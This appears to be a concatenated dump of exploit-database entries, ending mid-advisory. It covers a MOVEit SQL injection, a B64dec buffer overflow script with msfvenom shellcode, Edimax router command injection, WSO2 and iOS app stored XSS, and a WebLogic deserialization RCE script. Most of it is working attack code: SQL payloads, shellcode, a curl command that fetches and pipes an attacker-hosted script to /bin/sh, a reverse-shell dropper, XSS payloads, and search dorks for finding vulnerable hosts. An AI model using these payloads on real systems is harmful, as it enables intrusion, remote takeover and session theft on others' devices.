# Exploit Title: MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection # Google Dork: inurl:human.aspx intext:moveit # Date: 2020-04-12 # Exploit Authors: Aviv Beniash, Noam Moshe # Vendor Homepage: https://www.ipswitch.com/ # Version: MOVEit Transfer 2018 SP2 before 10.2.4, 2019 before 11.0.2, and 2019.1 before 11.1.1 # CVE : CVE-2019-16383 # # Related Resources: # https://community.ipswitch.com/s/article/SQL-Injection-Vulnerability # https://nvd.nist.gov/vuln/detail/CVE-2019-16383 # Description: # The API call for revoking logon tokens is vulnerable to a # Time based blind SQL injection via the 'token' parameter # MSSQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 32 token='; WAITFOR DELAY '0:0:10'-- # MySQL payload: POST /api/v1/token/revoke HTTP/1.1 Host: moveittransferstg Content-Type: application/x-www-form-urlencoded Content-Length: 21 token=' OR SLEEP(10);

# Exploit Title: B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter) # Date: 2020-04-13 # Exploit Author: Andy Bowden # Vendor Homepage: http://4mhz.de/b64dec.html # Software Link: http://4mhz.de/download.php?file=b64dec-1-1-2.zip # Version: Base64 Decoder 1.1.2 # Tested on: Windows 10 x86 #Instructions: # Run the script to create the Crash.txt file. Copy the contents of the file and paste them into the search box and then click decode. f = open("crash.txt", "wb") padding1 = b"ERCDERCD" padding1 += b"\x90" * 100 # msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x0a\x0d' # cmd=calc.exe exitfunc=thread -f python payload = b"" payload += b"\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29" payload += b"\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca" payload += b"\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca" payload += b"\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2" payload += b"\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17" payload += b"\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59" payload += b"\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1" payload += b"\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf" payload += b"\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82" payload += b"\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5" payload += b"\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4" payload += b"\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20" payload += b"\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d" payload += b"\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee" payload += b"\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9" payload += b"\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a" payload += b"\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d" egghunter = b"\x8B\xFD" # mov edi,ebp egghunter += b"\xB8\x45\x52\x43\x44" # mov eax,45525344 ERCD egghunter += b"\x47" # inc edi egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax egghunter += b"\x75\xFB" # jne egghunter += b"\x39\x07" # cmp dword ptr ds:[edi],eax egghunter += b"\x75\xF7" # jne egghunter += b"\xFF\xE7" # jmp edi buf = padding1 + payload buf += b"\x90" * (580 - len(padding1 + payload)) buf += egghunter buf += b"\x90" * (620 - len(buf)) buf += b"\x90\x90\xEB\xCE" buf += b"\x86\x1e\x40" #00401e86 f.write(buf) f.close()

# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution # Date: 2020-04-13 # Exploit Author: Wadeek # Hardware Version: EW-7438RPn-v3 Mini # Firmware Version: 1.23 / 1.27 # Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ # Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip == Shodan Dorks == (Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" (Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" == Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == GET /wizard_reboot.asp showSSID = "<WIRELESS-NAME>"; document.write('<font class=\"textcolor\">'+"<WIRELESS-SECURITY-KEY>"+'</font>'); == Command Execution * == (Setup Mode) curl 'http://<RHOST>/goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh' (Unsetup Mode with default password) curl 'http://<RHOST>/goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F<LHOST>%2Fdelivery.sh+%7C+%2Fbin%2Fsh' == Cross-Site Request Forgery -> Command Execution * == <form action="http://edimaxext.setup/goform/mp" method="POST"> <input type="hidden" name="command" value="|| busybox wget -O - http://<LHOST>/delivery.sh | /bin/sh"> <input type="submit" value=""> </form> * [ delivery.sh ] -------------------------------------------------------------------------------------- # (msfvenom) linux/mipsbe/shell/reverse_tcp cd /tmp/ busybox wget -O reverse http://<LHOST>/reverse busybox chmod +x reverse ./reverse & --------------------------------------------------------------------------------------

# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting # Date: 2020-04-13 # Author: raki ben hamouda # Vendor: https://apim.docs.wso2.com # Softwrare link: https://apim.docs.wso2.com/en/latest/ # CVE: N/A # Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 Technical Details & Description: ================================ A remote Stored Cross Site Scripting has been discovered in WSO2 API Manager Ressource Browser component). The security vulnerability allows a remote attacker With access to the component "Ressource Browser" to inject a malicious code in Add Comment Feature. The vulnerability is triggered after sending a POST request to `/carbon/info/comment-ajaxprocessor.jsp` with Parameter "comment=targeted&path=%2F". Remote attackers has the ablility to spread a malware,to Hijack a session (a session with Higher privileges), or to initiate phishing attacks. The security risk of the Stored XSS web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.4 Exploitation of the Stored XSS web vulnerability requires a low privilege web-application user account and medium or high user interaction. Successful exploitation of the vulnerability results in Compromising the server . Request Method: [+] POST Module: [+] /carbon/info/comment-ajaxprocessor.jsp Parameters: [+] comment=admincomment [+] path=%2F ======================================= POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 Host: 192.168.149.1:9443 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ X-Requested-With: XMLHttpRequest, XMLHttpRequest X-Prototype-Version: 1.5.0 Content-type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH Content-Length: 64 Cookie: region3_registry_menu=visible; region3_metadata_menu=none; wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 Connection: close comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F ============================== HTTP/1.1 200 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY vary: accept-encoding Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Tue, 31 Dec 2019 10:50:00 GMT Connection: close Server: WSO2 Carbon Server Content-Length: 3144 //the body of response includes attacker malicious script <a class="closeButton icon-link registryWriteOperation" onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete" style="background-image: url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a> <iframe href=http://phishing_url> <br/> posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker Proof of Concept (PoC): ======================= //Let's suppose we're Attacking an admin with higher privileges 1-Attacker opens his account 2-add arbitrary comment 3-intercepts the request 4-add malicious script to the comment 5-admin access his account,he wants to add a comment,the malicious script got executed ===>Admin account compromised =============================================================================== Example malicious script : <script> alert(document.cookie); </script> ===============================================================================

# Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: http://dropouts.in/ # Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 # CVE: N/A Document Title: =============== SuperBackup v2.0.5 iOS - (VCF) Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2202 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2202 Common Vulnerability Scoring System: ==================================== 4.6 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Backup all your iPhone or iPad contacts in 1 tap and export them. Fastest way to restore contacts from PC or Mac. Export by mailing the backed up contacts file to yourself. Export contacts file to any other app on your device. Export all contacts directly to your PC / Mac over Wifi, no software needed! Restore any contacts directly from PC / Mac. Restore contacts via mail. Get the ultimate contacts backup app now. (Copy of the Homepage: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site web vulnerabilities in the official SuperBackup v2.0.5 ios mobile application. Affected Product(s): ==================== Dropouts Technologies LLP Product: Super Backup v2.0.5 Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Pre auth - no privileges User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The cross site scripting web vulnerabilities are located in the `newPath`, `oldPath` & `filename` parameters of the vcf listing module. Remote attackers are able to inject own malicious persistent script codes as vcf filename to the main index list. The request method to inject is POST and the attack vector of the vulnerability is located on the application-side. The injection point is located at the vcf filename or import. The execution point occurs in the main index list after the import or insert. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] VCF Vulnerable Parameter(s): [+] newPath (path - vcf filename) [+] oldPath (path - vcf filename) Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers without privileged user account and with low user interaction. For security demonstration or to reproduce the cross site scripting vulnerability follow the provided information and steps below to continue. PoC: Payload (Filename) >"<iframe%20src=evil.source%20onload=alert("PWND")></iframe> PoC: Vulnerable Source (Listing - Index) <button type="button" class="btn btn-default btn-xs button-download"> <span class="glyphicon glyphicon-download-alt"></span> </button> </td> <td class="column-name"><p class="edit" title="Click to rename...">Contacts 09:17:12:PM 10:Apr.:2020 .vcf</p></td> <td class="column-size"> <p>26.40 KB</p> </td> <td class="column-delete"> <button type="button" class="btn btn-danger btn-xs button-delete"> <span class="glyphicon glyphicon-trash"></span> </button> </td> </tr></tbody></table> </div> PoC: Exception-Handling Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe> 09:17:12:PM 10:Apr.:2020 .vcf" - Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts 09:17:12:PM 10:Apr.:2020 >"<iframe src=evil.source onload=alert("PWND")></iframe> .vcf" - Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 .vcf" to "/Contacts >"<iframe src=evil.source onload=alert("PWND")></iframe>09:17:12:PM 10:Apr.:2020 .vcf" PoC: Exploit BEGIN:VCARD VERSION:3.0 PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN B:Kunz Mejri ;>"<iframe src=evil.source onload=alert("PWND")></iframe> ;;; END:VCARD --- PoC Session Logs [POST] --- http://localhost/move Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://localhost Connection: keep-alive Referer: http://localhost/ oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 .vcf&newPath=/evil-filename>"<iframe src=evil.source onload=alert("PWND")></iframe>.vc - POST: HTTP/1.1 500 Internal Server Error Content-Length: 593 Content-Type: text/html; charset=utf-8 Connection: Close Server: GCDWebUploader - http://localhost/evil.source Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://localhost/ - GET: HTTP/1.1 200 OK Server: GCDWebUploader Connection: Close Solution - Fix & Patch: ======================= 1. Parse and filter the vcf name values next to add, edit or imports to prevent an execution 2. Restrict and filter in the index listing the vcf names to sanitize the output Security Risk: ============== The security risk of the persistent vcf cross site scripting web vulnerability is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM

# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution # Author: nu11secur1ty # Date: 2020-03-31 # Vendor: Oracle # Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip # Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555 # CVE: CVE-2020-2555 [+] Credits: Ventsislav Varbanovski (nu11secur1ty) [+] Source: readme from GitHUB [Exploit Program Code] -------------------------- #!/usr/bin/python # @nu11secur1ty import socket import os import sys import struct if len(sys.argv) < 3: print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0]) sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) server_address = (sys.argv[1], int(sys.argv[2])) print '[+] Connecting to %s port %s' % server_address sock.connect(server_address) # Send headers headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n' print 'sending "%s"' % headers sock.sendall(headers) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data payloadObj = open(sys.argv[3],'rb').read() payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00' payload=payload+payloadObj payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' payload=struct.pack('>I',len(payload)) + payload[4:] print '[+] Sending payload...' sock.send(payload) data = sock.recv(1024) print >>sys.stderr, 'received "%s"' % data [Vendor] Oracle [Vulnerability Type] Network Remote [Description] Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence. Successful attacks of this vulnerability can result in takeover of Oracle Coherence. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). [Disclosure Timeline] 2019/12/10 [+] Disclaimer The entry creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE. [Video] https://www.youtube.com/watch?v=59jt8rr8ECc @nu11secur1ty -- hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty

# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting # Author: Vulnerability Laboratory # Date: 2020-04-15 # Vendor: http://www.app2pro.com # Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 # CVE: N/A Document Title: =============== AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2203 Release Date: ============= 2020-04-15 Vulnerability Laboratory ID (VL-ID): ==================================== 2203 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== File sharing with other iOS devices via Bluetooth or Wi-Fi connection with automatic search of nearest devices. Users can perform file operations on the application like: Copy, Move, Zip, Unzip, Rename, Delete, Email, and more. Easy to create file like: Text File, New folder, Playlist, Take Photo/Video, Import From Library, and Voice Record. AirDisk Pro allows you to store, view and manage files on your iPhone, iPad or iPod touch. You can connect to AirDisk Pro from any Mac or PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. AirDisk Pro features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most of the file operations: like delete, move, copy, email, share, zip, unzip and more. (Copy of the Homepage: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) (Copy of the Homepage: http://www.app2pro.com ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile application. Affected Product(s): ==================== Felix Yew Product: AirDisk Pro v5.5.3 (iOS) Vulnerability Disclosure Timeline: ================================== 2020-04-15: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== No authentication (guest) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple persistent cross site scripting vulnerability has been discovered in the official SuperBackup v2.0.5 ios mobile application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise the mobile web-application from the application-side. The first vulnerability is located in the `createFolder` parameter of the `Create Folder` function. Attackers are able to name or rename paths via airdisk pro ui to malicious persistent script codes. Thus allows to execute the persistent injected script code on the front site of the path index listing in the content itself on each refresh. The request method to inject is POST and the attack vector is located on the application-side. Interaction to exploit is as well possible through the unauthenticated started ftp service on the local network. The second vulnerability is located in the `deleteFile` parameter of the `Delete` function. The output location with the popup that asks for permission to delete, allows to execute the script code. The injection point is the file parameter and the execution point occurs in the visible delete popup with the permission question. The request method to inject is POST and the attack vector is located on the application-side. The third web vulnerability is located in the `devicename` parameter that is displayed on the top next to the airdisk pro ui logo. Remote attackers are able to inject own malicious persistent script code by manipulation of the local apple devicename information. The injection point is the devicename information and the execution point occurs in the file sharing ui panel of the airdisk pro mobile web-application. Remote attackers are able to inject own script codes to the client-side requested vulnerable web-application parameters. The attack vector of the vulnerability is persistent and the request method to inject/execute is POST. The vulnerabilities are classic client-side cross site scripting vulnerabilities. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] AirDisk pro Wifi UI Vulnerable Parameter(s): [+] createFolder [+] deleteFile [+] devicename Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with wifi access with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1. Create Folder PoC: Vulnerable Source <tbody> <form name="checkbox_form"></form> <tr><td class="e"><input type="checkbox" name="selection" value="test"></td><td class="i"><a href="test/"><img src="/webroot/fileicons/folder.png" width="20" height="20"></a></td><td class="n"><a href="test/">test</a></td><td class="m">11 Apr 2020 at 12:35</td><td class="s"></td><td class="k">Folder</td> <td class="e"><span style="height:15px; width:15px;">&nbsp;</span></td><td class="e"><a href="#" title="Rename file" onclick="modalPopup("test", 0, 0);"> <img src="/webroot/webrename.png" width="15" height="15"></a></td><td 